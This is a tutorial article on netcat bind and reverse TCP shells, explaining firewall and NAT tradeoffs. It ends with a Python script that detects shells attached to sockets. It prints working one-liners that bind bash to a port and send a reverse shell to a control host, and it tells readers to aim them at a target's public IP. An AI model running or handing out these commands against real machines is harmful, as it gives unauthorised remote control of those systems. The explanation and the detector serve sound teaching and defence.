When I was learning this, I was disappointed with the internet guides for setting up remote access (a backdoor to a computer), so here's my contribution. It's also important for security- and privacy-conscious people to understand this, because these same methods are often used maliciously to gain control over a target computer.
In this article, I’m going to cover theory and practice behind binding TCP shells and reverse TCP shells. After that I will briefly touch upon their advanced versions – secure shells (SSH) and reverse secure shells.
Transmission Control Protocol (TCP) is a way to transfer data from one IP address to another. It’s used to transfer the command to the remote computer as well as the command output back to the command and control computer. In TCP connections, one side has to listen for a connection and the other side has to connect.
There are 2 ways to get a shell on a remote machine:
- The remote machine listens for a connection. There has to be a process on the remote machine that waits for a connection and executes a shell once the connection is established.
- The remote machine connects to us. This one goes the other way around: the local command and control machine has to listen for a connection and the remote machine has to 'send' a shell to the listener.
Which one is better? Of course, it depends on the circumstances, otherwise only one would be worth mentioning. Each of the following paragraphs explains the corresponding row in the table below.
At first glance, option #1 seems superior because we can connect to the remote computer at any time, instantly. When using a reverse shell, persistent backdoors try to connect to the control computer periodically, so we usually have to wait.
By default, the firewall blocks all incoming connections to the machine. To allow connections to the listener process, the firewall must open that port. A default firewall configuration only filters incoming connections and places no restrictions on outgoing ones, so by choosing option #1 or option #2, you're also choosing which computer's firewall you need to configure. This is why hackers prefer reverse shells: it's easier to configure their own firewall than the victim's.
When a TCP connection passes through a router doing NAT, each side's router assigns a unique port to a specific computer in the local area network. That's how the router knows which packet should be sent to which computer in the LAN. If we try to connect to our listener on the remote machine (option #1) without configuring the router to forward our connection to the exact computer and exact port, the router will refuse the connection because it doesn't know where to send the packet. By choosing option #1 or option #2, you're also choosing which router needs to be configured to port forward the connection. Obviously, hackers prefer to configure their own router rather than their victim's.
Hopefully, you can answer the question yourself after reading this. Here’s the summary:
| | Option #1 – Bind TCP shell to a port | Option #2 – Reverse TCP shell |
|---|---|---|
| Firewall | Must be configured or turned off on remote machine | Must be configured or turned off on control machine |
| Port forwarding | Must be configured on remote machine's router | Must be configured on local machine's router |
If you don't know where your computer is going to be, a reverse shell is the way to go because you can always configure the firewall and port forwarding at your own location. If you can configure the firewall and port forwarding on the remote side beforehand, you might want to enjoy the instant access.
I'm going to use netcat for the demonstration because it's available for Linux (featured here), Windows and Mac computers. It's also the simplest and most straightforward way to go. If you need to do either of these without netcat, you can use Metasploit to generate a program for the desired system.
Option #1 – Normal Shell
We need to bind a shell to a port and wait for a connection. Executing this on the remote machine will do it:
nc -l -p 4444 -e /bin/bash
-l listen for a connection
-p specifies a port to listen on
-e run this upon connection
-k listen again after the connection is closed
-v produce verbose output – use this to debug
Now, we need to connect to that listener from our local machine. I'm connecting to my own computer for demo purposes, so I use 127.0.0.1 as the IP address. You should replace it with the target's public IP address.
nc 127.0.0.1 4444
Option #2 – Reverse Shell
As previously discussed, we need to listen for a connection on our local command and control computer:
nc -l -p 4444
Now, the remote computer has to send a shell by executing this (replace 127.0.0.1 with the public IP that belongs to your command and control computer):
nc 127.0.0.1 4444 -c /bin/bash
-c specifies a program to start upon connecting
Keep in mind that these backdoors' connections are in plain text and without any authentication. That's why there are secure shells (SSH) and reverse secure shells, which work the same way but add encryption and password authentication.
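As an added defensive check (not part of the original article), here is a small Python script that flags the footprint both of the netcat shells above leave on the machine running them: a shell process whose standard file descriptors are a TCP socket (what `-e /bin/bash` / `-c /bin/bash` produce), or a netcat process holding a listening socket. It parses `ss -tanp` output on Linux; the sample lines, PIDs and addresses are constructed for the demo.

```python
import re

# Constructed sample of `ss -tanp` output: a netcat bind-shell listener on
# 4444, a reverse shell whose bash has stdio on the socket, and a benign sshd.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      1      0.0.0.0:4444        0.0.0.0:*          users:(("nc",pid=1234,fd=3))
ESTAB  0      0      10.0.0.5:50310      203.0.113.7:4444   users:(("bash",pid=1300,fd=0),("bash",pid=1300,fd=1),("bash",pid=1300,fd=2))
ESTAB  0      0      10.0.0.5:22         10.0.0.9:51822     users:(("sshd",pid=880,fd=4))
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NETCATS = {"nc", "ncat", "netcat"}
# Matches each ("name",pid=N,fd=N) entry inside the users:(...) column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')


def parse_ss(text):
    """Yield (state, local, peer, [(name, pid, fd), ...]) for each socket line."""
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 5)            # 6 columns; Process may contain spaces
        if len(fields) < 6:
            continue
        state, _recvq, _sendq, local, peer, procs = fields
        owners = [(n, int(p), int(f)) for n, p, f in PROC_RE.findall(procs)]
        yield state, local, peer, owners


def find_socket_shells(text):
    """Return (pid, name, socket, reason) findings from ss -tanp output.

    A shell reached through `nc -e`/`nc -c` has fds 0-2 pointing at the
    socket; an interactive shell has them on a tty, so this is a strong signal
    for either a bind or a reverse shell. A netcat LISTEN socket is reported too.
    """
    findings = []
    for state, local, peer, owners in parse_ss(text):
        for name, pid, fd in owners:
            if name in SHELLS and fd in (0, 1, 2):
                findings.append((pid, name, f"{state} {local} <-> {peer}", "shell stdio on socket"))
                break                           # one finding per socket
            if name in NETCATS and state == "LISTEN":
                findings.append((pid, name, f"LISTEN {local}", "netcat listener"))
    return findings


if __name__ == "__main__":
    for pid, name, sock, reason in find_socket_shells(SAMPLE_SS_OUTPUT):
        print(f"pid={pid} {name}: {reason} ({sock})")
```

On a live host, feed it the real output with `ss -tanp` run as root so the Process column is populated for every socket.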